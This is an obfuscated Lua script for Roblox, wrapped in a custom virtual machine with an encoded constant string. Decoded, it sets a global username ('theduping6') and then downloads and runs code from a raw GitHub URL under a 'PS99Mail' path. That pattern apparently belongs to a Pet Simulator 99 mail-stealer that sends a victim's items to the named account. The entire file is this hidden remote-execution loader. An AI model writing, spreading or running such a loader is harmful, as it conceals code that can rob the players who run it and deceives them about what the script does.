--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -(619 -(555 + 64)) ;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=1;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (933 -(857 + 74)) );v19=v19 + (570 -(367 + 201)) ;return (v34 * (1183 -(214 + 713))) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=1 + 0 ;local v38=(v21(v36,(792 -(368 + 423)) + 0 ,897 -(282 + 595) ) * ((1639 -(1523 + 114))^(29 + 3))) + v35 ;local v39=v21(v36,(111 -82) -8 ,983 -(802 + 150) );local v40=((v21(v36,1097 -(68 + (1439 -(416 + 26))) )==((4058 -2787) -(226 + 1044))) and  -(4 -3)) or (1 + 0) ;if (v39==(997 -(393 + 522 + (257 -175)))) then if (v38==(0 -0)) then return v40 * (0 -0) ;else v39=118 -(32 + 85) ;v37=0 + 0 ;end elseif (v39==((472 -(10 + 8)) + 1593)) then return ((v38==(957 -(892 + 65))) and (v40 * ((1 -0)/(0 -0)))) or (v40 * NaN) ;end return v8(v40,v39-(1890 -867) ) * (v37 + (v38/((3 -1)^(94 -42)))) ;end v26=nil;function v26(v41)local v42;if  not v41 then v41=v24();if (v41==(1486 -(998 + 488))) then return "";end end v42=v3(v16,v19,(v19 + v41) -(439 -(145 + (1065 -(201 + 571)))) );v19=v19 + v41 ;local v43={};for v67=(1569 -(116 + 1022)) -((183 -139) + 386) , #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=1941 -(550 + 1391) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v44~=3) then else v51=nil;while true do local v78=0 -0 ;while true do if (v78~=1) then else if (3==v45) then for v105=1,v24() do v47[v105-(1 -0) ]=v29();end return v49;end if ((1785 -(599 + 1185))~=v45) then else local v102=0;while true do if (v102~=(1 + 0)) then else v51={};v45=2 + 0 ;break;end if (v102~=0) then else v49={v46,v47,nil,v48};v50=v24();v102=2 -1 ;end end end break;end if (v78==(0 -0)) then if (v45~=0) then else local v103=867 -(550 + 317) ;while true do if (v103==0) then v46={};v47={};v103=1 -0 ;end if (v103~=(1 -0)) then else v48={};v45=2 -1 ;break;end end end if (v45~=2) then else local v104=0;while true do if (v104==0) then for v131=286 -(134 + 151) ,v50 do local v132=1665 -(970 + 695) ;local v133;local v134;local v135;while true do if (v132==(1 -0)) then v135=nil;while true do if (v133~=(1990 -(582 + 1408))) then else v134=v22();v135=nil;v133=3 -2 ;end if (v133~=1) then else if (v134==1) then v135=v22()~=(0 -0) ;elseif (v134==(7 -5)) then v135=v25();elseif (v134~=(1827 -(1195 + 629))) then else v135=v26();end v51[v131]=v135;break;end end break;end if (v132==(0 -0)) then v133=241 -(187 + 54) ;v134=nil;v132=781 -(162 + 618) ;end end end v49[3]=v22();v104=1;end if (v104~=(1 + 0)) then else for v136=1,v24() do local v137=0 + 0 ;local v138;local v139;local v140;while true do if (v137~=(1 -0)) then else v140=nil;while true do if ((0 -0)==v138) then local v170=0 + 0 ;while true do if (v170~=0) then else v139=1636 -(1373 + 263) ;v140=nil;v170=1;end if (v170~=1) then else v138=1;break;end end end if (v138==(1001 -(451 + 549))) then while true do if (v139==(0 + 0)) then v140=v22();if (v21(v140,1,1 -0 )~=0) then else local v171=0;local v172;local v173;local v174;local v175;local v176;while true do if (v171==2) then v176=nil;while true do if (v172~=(1 -0)) then else local v177=0;while true do if (v177~=1) then else v172=1386 -(746 + 638) ;break;end if (v177==0) then v175=nil;v176=nil;v177=1;end end end if (v172~=0) then else v173=0 + 0 ;v174=nil;v172=1;end if (v172~=(2 -0)) then else while true do if (v173==1) then local v178=341 -(218 + 123) ;local v179;while true do if (v178==(1581 -(1535 + 46))) then v179=0;while true do if ((0 + 0)~=v179) then else local v187=0 + 0 ;local v188;while true do if (v187==(560 -(306 + 254))) then v188=0;while true do if (v188==(0 + 0)) then v176={v23(),v23(),nil,nil};if (v174==0) then local v193=0 -0 ;local v194;while true do if ((603 -(268 + 335))~=v193) then else v194=290 -(60 + 230) ;while true do if (v194~=(572 -(426 + 146))) then else v176[1 + 2 ]=v23();v176[1460 -(282 + 1174) ]=v23();break;end end break;end end elseif (v174==(812 -(569 + 242))) then v176[3]=v24();elseif (v174==(5 -3)) then v176[3]=v24() -(2^16) ;elseif (v174==(1 + 2)) then local v203=0;local v204;local v205;while true do if (v203~=(1024 -(706 + 318))) then else v204=0;v205=nil;v203=1;end if (1==v203) then while true do if (v204==(1251 -(721 + 530))) then v205=1271 -(945 + 326) ;while true do if ((0 -0)==v205) then v176[3]=v24() -(2^(15 + 1)) ;v176[4]=v23();break;end end break;end end break;end end end v188=701 -(271 + 429) ;end if (1~=v188) then else v179=1 + 0 ;break;end end break;end end end if ((1501 -(1408 + 92))~=v179) then else v173=1088 -(461 + 625) ;break;end end break;end end end if (0==v173) then local v180=0;local v181;while true do if (v180~=(1288 -(993 + 295))) then else v181=0;while true do if (v181~=(0 + 0)) then else local v189=1171 -(418 + 753) ;while true do if (v189==1) then v181=1 + 0 ;break;end if (v189==(0 + 0)) then v174=v21(v140,2,3);v175=v21(v140,4,2 + 4 );v189=1;end end end if (v181~=(1 + 0)) then else v173=1;break;end end break;end end end if (v173==(531 -(406 + 123))) then local v182=0;local v183;while true do if (v182~=(1769 -(1749 + 20))) then else v183=0;while true do if (v183==(0 + 0)) then local v190=0;local v191;while true do if (v190~=(1322 -(1249 + 73))) then else v191=0;while true do if (v191~=(1 + 0)) then else v183=1146 -(466 + 679) ;break;end if (v191~=0) then else local v192=0;while true do if (v192~=(2 -1)) then else v191=2 -1 ;break;end if (v192~=0) then else if (v21(v175,1,1)==1) then v176[1902 -(106 + 1794) ]=v51[v176[1 + 1 ]];end if (v21(v175,2,1 + 1 )==1) then v176[3]=v51[v176[8 -5 ]];end v192=1;end end end end break;end end end if (v183==(2 -1)) then v173=3;break;end end break;end end end if (v173==3) then if (v21(v175,3,117 -(4 + 110) )==1) then v176[588 -(57 + 527) ]=v51[v176[4]];end v46[v136]=v176;break;end end break;end end break;end if (v171==1) then v174=nil;v175=nil;v171=2;end if (v171~=0) then else v172=0;v173=nil;v171=1428 -(41 + 1386) ;end end end break;end end break;end end break;end if (v137==(103 -(17 + 86))) then v138=0;v139=nil;v137=1 + 0 ;end end end v45=3;break;end end end v78=1;end end end break;end if (1==v44) then v47=nil;v48=nil;v44=3 -1 ;end if (v44==2) then v49=nil;v50=nil;v44=3;end if (v44==0) then v45=0;v46=nil;v44=2 -1 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then local v69=0;while true do if (v69==0) then v20=v0(v3(v52,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v52,16));if v20 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v5(v71,v20);v20=nil;v96=1;end end else return v71;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + (169 -(122 + 44)) );v19=v19 + (6 -2) ;return (v56 * (55657927 -38880711)) + (v55 * (53313 + (24761 -12538))) + (v54 * (38 + 218)) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==1) then v63=v57[3];return function(...)local v79=v61;local v80=v62;local v81=v63;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=4) then if (v92<=1) then if (v92>0) then v89[v91[2]]=v91[3];else v89[v91[2]]();end elseif (v92<=2) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v59;else v89[v91[2]]=v59[v91[3]];end elseif (v92==3) then v59[v91[3]]=v89[v91[2]];else do return;end end elseif (v92<=7) then if (v92<=5) then local v109;local v110,v111;local v112;local v113;v59[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v59;else v89[v91[2]]=v59[v91[3]];end v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v59;else v89[v91[2]]=v59[v91[3]];end v83=v83 + 1 ;v91=v79[v83];v113=v91[2];v112=v89[v91[3]];v89[v113 + 1 ]=v112;v89[v113]=v112[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v113=v91[2];v110,v111=v82(v89[v113](v13(v89,v113 + 1 ,v91[3])));v84=(v111 + v113) -1 ;v109=0;for v129=v113,v84 do local v130=0;while true do if (v130==0) then v109=v109 + 1 ;v89[v129]=v110[v109];break;end end end v83=v83 + 1 ;v91=v79[v83];v113=v91[2];v89[v113]=v89[v113](v13(v89,v113 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];elseif (v92>6) then local v152=0;local v153;while true do if (v152==0) then v153=v91[2];v89[v153]=v89[v153](v13(v89,v153 + 1 ,v84));break;end end else local v154=v91[2];local v155=v89[v91[3]];v89[v154 + 1 ]=v155;v89[v154]=v155[v91[4]];end elseif (v92<=8) then local v123=0;local v124;local v125;local v126;local v127;while true do if (v123==0) then v124=v91[2];v125,v126=v82(v89[v124](v13(v89,v124 + 1 ,v91[3])));v123=1;end if (v123==2) then for v163=v124,v84 do v127=v127 + 1 ;v89[v163]=v125[v127];end break;end if (v123==1) then v84=(v126 + v124) -1 ;v127=0;v123=2;end end elseif (v92>9) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v83=v91[3];end v83=v83 + 1 ;end end;end if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v72=(v64/((67 -(30 + 35))^(v65-1)))%((2 + 0)^(((v66-(1258 -(1043 + 214))) -(v65-(3 -2))) + (1213 -(323 + 889)))) ;return v72-(v72%(2 -1)) ;else local v73=580 -((1343 -(18 + 964)) + 219) ;local v74;while true do if (v73==(320 -((199 -146) + 155 + 112))) then v74=2^(v65-(1 + 0)) ;return (((v64%(v74 + v74))>=v74) and (1 + (850 -(20 + 830)))) or (413 -(15 + 311 + 87)) ;end end end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003083O00557365726E616D65030A3O00746865647570696E6736030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012013O00013O00260A3O0001000100010004093O00010001001201000100033O001205000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E00010004093O000100012O00043O00017O00",v9(),...);
